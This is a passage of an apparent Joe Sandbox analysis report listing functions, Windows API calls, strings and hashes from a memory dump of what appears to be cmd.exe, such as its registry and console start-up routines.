7ff6eb18f39a-7ff6eb18f39d 619->623 624 
7ff6eb18580f-7ff6eb185813 619->624 626 7ff6eb18f3be-7ff6eb18f3c5 620->626 627 7ff6eb18582c 620->627 621->623 622->621 623->613 624->623 625 7ff6eb185819-7ff6eb185823 624->625 625->620 628 7ff6eb185829 625->628 629 7ff6eb185832-7ff6eb185870 RegQueryValueExW 626->629 627->629 630 7ff6eb18f3ca-7ff6eb18f3d1 627->630 628->627 631 7ff6eb185876-7ff6eb185882 RegCloseKey 629->631 632 7ff6eb18f3dd-7ff6eb18f3e2 629->632 630->632 631->583 633 7ff6eb18f433-7ff6eb18f439 632->633 634 7ff6eb18f3e4-7ff6eb18f412 ExpandEnvironmentStringsW 632->634 633->631 635 7ff6eb18f43f-7ff6eb18f44c call 7ff6eb17b900 633->635 636 7ff6eb18f414-7ff6eb18f426 call 7ff6eb1813e0 634->636 637 7ff6eb18f428 634->637 635->631 640 7ff6eb18f42e 636->640 637->640 640->633
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: QueryValue$CloseOpensrandtime
                                              • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                              • API String ID: 145004033-3846321370
                                              • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                              • Instruction ID: 804a82e11a3a57b63e2b8e46cdfa143d765c95b8275fbbdf4a37b91cc345e655
                                              • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                              • Instruction Fuzzy Hash: F1E1533351DA82C6E7508B10E4507FAB7A0FB8D768F405535E98E82A78DF7EE548CB06

                                              Control-flow Graph

                                              control_flow_graph: function 7ff6eb1837d8, entry block 821 (rendered graph data omitted). Basic blocks call GetCurrentThreadId, OpenThread, HeapSetInformation, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetConsoleOutputCP, GetCPInfo, GetThreadLocale, memset, _setjmp and _setmode, plus internal subroutines 7ff6eb1804f4, 7ff6eb185920, 7ff6eb184d5c, 7ff6eb173240, 7ff6eb198530, 7ff6eb184c1c, 7ff6eb1801b8, 7ff6eb1886f0, 7ff6eb17df60, 7ff6eb180580, 7ff6eb17be00 and 7ff6eb1858e4.
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                              • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                              • API String ID: 2624720099-1920437939
                                              • Opcode ID: f14ccfe17658d03b7f0c6aedd8572f1845147b0a0877a5eeff18d3955b8dfa43
                                              • Instruction ID: 5c9f5a0bed28deaf2e3436219264cc06f65e2a9f46ce897129fd31c0024e6186
                                              • Opcode Fuzzy Hash: f14ccfe17658d03b7f0c6aedd8572f1845147b0a0877a5eeff18d3955b8dfa43
                                              • Instruction Fuzzy Hash: DBC1CE33E086428AF7149B64A4403F9AAA0FF4E77CF544138DA0ED67B5DF3EA045870A

                                              Control-flow Graph

                                              control_flow_graph: function 7ff6eb18823c, entry block 1118 (rendered graph data omitted). Basic blocks call FindFirstFileExW, FindNextFileW, FindClose, GetLastError, GetProcessHeap, HeapAlloc and HeapReAlloc; no internal subroutine calls.
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ErrorFileFindFirstLast
                                              • String ID:
                                              • API String ID: 873889042-0
                                              • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                              • Instruction ID: f2e18aa780218ef2bef07233d1816177fa75ab7f6153ea080f5e5b057b46c579
                                              • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                              • Instruction Fuzzy Hash: 10511B37A09B42C6E7118B11E5543B9BBA1FB4DBA9F448131CA1D83364DF3EE5548B09

                                              Control-flow Graph

                                              control_flow_graph: function 7ff6eb182978, entry block 1142 (rendered graph data omitted). Basic blocks call FindFirstFileW, FindClose, _wcsnicmp, _wcsicmp and memmove, plus internal subroutines 7ff6eb188f80 and 7ff6eb1813e0.
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                              • Instruction ID: 43d2ec2131d2609cb4a9e66e2dae60f1f3be5f04f302d49f8b5fba9d193fb70c
                                              • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                              • Instruction Fuzzy Hash: BE51F863F0868285EA308F15A5443FAA690FB58BB8F484231DE6E876F4DF3DE4458646

                                              Control-flow Graph

                                              control_flow_graph: function 7ff6eb184d5c, entry block 643 (rendered graph data omitted). Basic blocks call InitializeCriticalSection, SetConsoleCtrlHandler, _get_osfhandle, GetConsoleMode, GetCommandLineW, GetWindowsDirectoryW, GetConsoleOutputCP, GetCPInfo, GetProcessHeap, HeapAlloc, GetConsoleTitleW, GetStdHandle, GetConsoleScreenBufferInfo, GlobalFree, GetModuleHandleW, GetProcAddress (three times) and free, plus numerous internal subroutines, among them 7ff6eb185554, 7ff6eb183c24 and 7ff6eb182394, whose graphs are also listed in this report.
                                              APIs
                                              • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184D9A
                                                • Part of subcall function 00007FF6EB1858E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF6EB19C6DB), ref: 00007FF6EB1858EF
                                              • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184DBB
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB184DCA
                                              • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184DE0
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB184DEE
                                              • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184E04
                                                • Part of subcall function 00007FF6EB180580: _get_osfhandle.MSVCRT ref: 00007FF6EB180589
                                                • Part of subcall function 00007FF6EB180580: SetConsoleMode.KERNELBASE ref: 00007FF6EB18059E
                                                • Part of subcall function 00007FF6EB180580: _get_osfhandle.MSVCRT ref: 00007FF6EB1805AF
                                                • Part of subcall function 00007FF6EB180580: GetConsoleMode.KERNELBASE ref: 00007FF6EB1805C5
                                                • Part of subcall function 00007FF6EB180580: _get_osfhandle.MSVCRT ref: 00007FF6EB1805EF
                                                • Part of subcall function 00007FF6EB180580: GetConsoleMode.KERNELBASE ref: 00007FF6EB180605
                                                • Part of subcall function 00007FF6EB180580: _get_osfhandle.MSVCRT ref: 00007FF6EB180632
                                                • Part of subcall function 00007FF6EB180580: SetConsoleMode.KERNELBASE ref: 00007FF6EB180647
                                                • Part of subcall function 00007FF6EB184A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A28
                                                • Part of subcall function 00007FF6EB184A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A66
                                                • Part of subcall function 00007FF6EB184A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A7D
                                                • Part of subcall function 00007FF6EB184A14: memmove.MSVCRT(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A9A
                                                • Part of subcall function 00007FF6EB184A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184AA2
                                                • Part of subcall function 00007FF6EB184AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB178798), ref: 00007FF6EB184AD6
                                                • Part of subcall function 00007FF6EB184AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB178798), ref: 00007FF6EB184AEF
                                                • Part of subcall function 00007FF6EB185554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF6EB184E35), ref: 00007FF6EB1855DA
                                                • Part of subcall function 00007FF6EB185554: RegQueryValueExW.KERNELBASE ref: 00007FF6EB185623
                                                • Part of subcall function 00007FF6EB185554: RegQueryValueExW.KERNELBASE ref: 00007FF6EB185667
                                                • Part of subcall function 00007FF6EB185554: RegQueryValueExW.KERNELBASE ref: 00007FF6EB1856BE
                                                • Part of subcall function 00007FF6EB185554: RegQueryValueExW.KERNELBASE ref: 00007FF6EB185702
                                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184E35
                                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184E81
                                              • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184F69
                                              • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184F95
                                              • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184FB0
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184FC1
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184FD8
                                              • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184FF8
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB185037
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB18504B
                                              • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB1850DF
                                              • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB1850F2
                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB18510F
                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB185130
                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB18514A
                                              • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB185175
                                                • Part of subcall function 00007FF6EB183578: _get_osfhandle.MSVCRT ref: 00007FF6EB183584
                                                • Part of subcall function 00007FF6EB183578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB18359C
                                                • Part of subcall function 00007FF6EB183578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835C3
                                                • Part of subcall function 00007FF6EB183578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835D9
                                                • Part of subcall function 00007FF6EB183578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835ED
                                                • Part of subcall function 00007FF6EB183578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB183602
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                              • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                              • API String ID: 1049357271-3021193919
                                              • Opcode ID: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                              • Instruction ID: 4b63d6c709d74c5a591814c63b6cecdbe609902b7187e5c6718eac40140f7d97
                                              • Opcode Fuzzy Hash: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                              • Instruction Fuzzy Hash: 93C17223A08A42D6EA059B51F9503F977A0FF8DBB8F454134D90E877B5DF3EA409870A

                                              Control-flow Graph

                                              control_flow_graph: function 7ff6eb183c24, entry block 732 (rendered graph data omitted). Basic blocks call GetCurrentDirectoryW, SetCurrentDirectoryW, GetFullPathNameW, GetFileAttributesW, GetLastError, towupper, iswalpha and _local_unwind, plus internal subroutines 7ff6eb17af14, 7ff6eb17ca40, 7ff6eb18855c, 7ff6eb17b900, 7ff6eb188f80, 7ff6eb18a5d6, 7ff6eb182978, 7ff6eb18498c, 7ff6eb18417c and 7ff6eb17ff70.
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                              • String ID: :
                                              • API String ID: 1809961153-336475711

                                              Control-flow Graph

                                              • Control-flow graph of the function at 7ff6eb182394 (API calls in the graph: memset, GetModuleFileNameW, _wcsupr, wcschr, wcsrchr, _wcsicmp, ??_V@YAXPEAX@Z)
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                              • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                              • API String ID: 2622545777-4197029667

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: ConsoleMode_get_osfhandle
                                              • String ID: CMD.EXE
                                              • API String ID: 1606018815-3025314500

                                              Control-flow Graph

                                              • Control-flow graph of the function at 7ff6eb17c620 (API calls in the graph: GetConsoleTitleW, SetConsoleTitleW, GetLastError, towupper, wcsncmp, wcschr)
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: ConsoleTitlewcschr
                                              • String ID: /$:
                                              • API String ID: 2364928044-4222935259

                                              Control-flow Graph

                                              • Control-flow graph of the function at 7ff6eb188d80 (API calls in the graph: Sleep, _amsg_exit, _initterm, exit, _cexit)
                                              APIs
                                              Similarity
                                              • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                              • String ID:
                                              • API String ID: 4291973834-0

                                              Control-flow Graph

                                              • Control-flow graph of the function at 7ff6eb184a14 (API calls in the graph: GetEnvironmentStringsW, GetProcessHeap, HeapAlloc, memmove, FreeEnvironmentStringsW)
                                              APIs
                                              • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A28
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A66
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A7D
                                              • memmove.MSVCRT(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A9A
                                              • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184AA2
                                              Similarity
                                              • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                              • String ID:
                                              • API String ID: 1623332820-0

                                              Control-flow Graph

                                              APIs
                                              Similarity
                                              • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                              • String ID:
                                              • API String ID: 1826527819-0
                                              APIs
                                              Similarity
                                              • API ID: ErrorMode$FullNamePathwcschr
                                              • String ID:
                                              • API String ID: 1464828906-0
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: memset
                                              • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                              • API String ID: 2221118986-3416068913
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: memsetwcschr
                                              • String ID: 2$COMSPEC
                                              • API String ID: 1764819092-1738800741
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                              • String ID:
                                              • API String ID: 4254246844-0
                                              • Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                              • Instruction ID: af03ef898b14134bc329006e2ee32e4d55c6c8b57785a6c0249134ffdcca7f61
                                              • Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                              • Instruction Fuzzy Hash: CA418323A0C74286EE219B00E5543F9B7A0FF8DBA8F484531D94EC77A5DF3EE445864A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _get_osfhandle$ConsoleMode
                                              • String ID:
                                              • API String ID: 1591002910-0
                                              • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                              • Instruction ID: 52e85516d7e7b19469af8813d64f0e9a3dd2d8be7a46c06e0c4a29e14f5dedf7
                                              • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                              • Instruction Fuzzy Hash: AEF07A36A59642CBE6148B10F9953F97BA0FB8D729F454135C90E83338DF3EB4158B06
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: DriveType
                                              • String ID: :
                                              • API String ID: 338552980-336475711
                                              • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                              • Instruction ID: 3ba2c17f064935a308248ff5a329a261169b4fb7da43acfaa48617cc803b8a5b
                                              • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                              • Instruction Fuzzy Hash: 36E06D6762864086E7209B60E4511AAB7A0FB8D758F841525EA8D83734DF3CD249CF0D
                                              APIs
                                                • Part of subcall function 00007FF6EB17CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDA6
                                                • Part of subcall function 00007FF6EB17CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDBD
                                              • GetConsoleTitleW.KERNELBASE ref: 00007FF6EB185B52
                                                • Part of subcall function 00007FF6EB184224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6EB184297
                                                • Part of subcall function 00007FF6EB184224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6EB1842D7
                                                • Part of subcall function 00007FF6EB184224: memset.MSVCRT ref: 00007FF6EB1842FD
                                                • Part of subcall function 00007FF6EB184224: memset.MSVCRT ref: 00007FF6EB184368
                                                • Part of subcall function 00007FF6EB184224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6EB184380
                                                • Part of subcall function 00007FF6EB184224: wcsrchr.MSVCRT ref: 00007FF6EB1843E6
                                                • Part of subcall function 00007FF6EB184224: lstrcmpW.KERNELBASE ref: 00007FF6EB184401
                                              • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF6EB185BC7
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
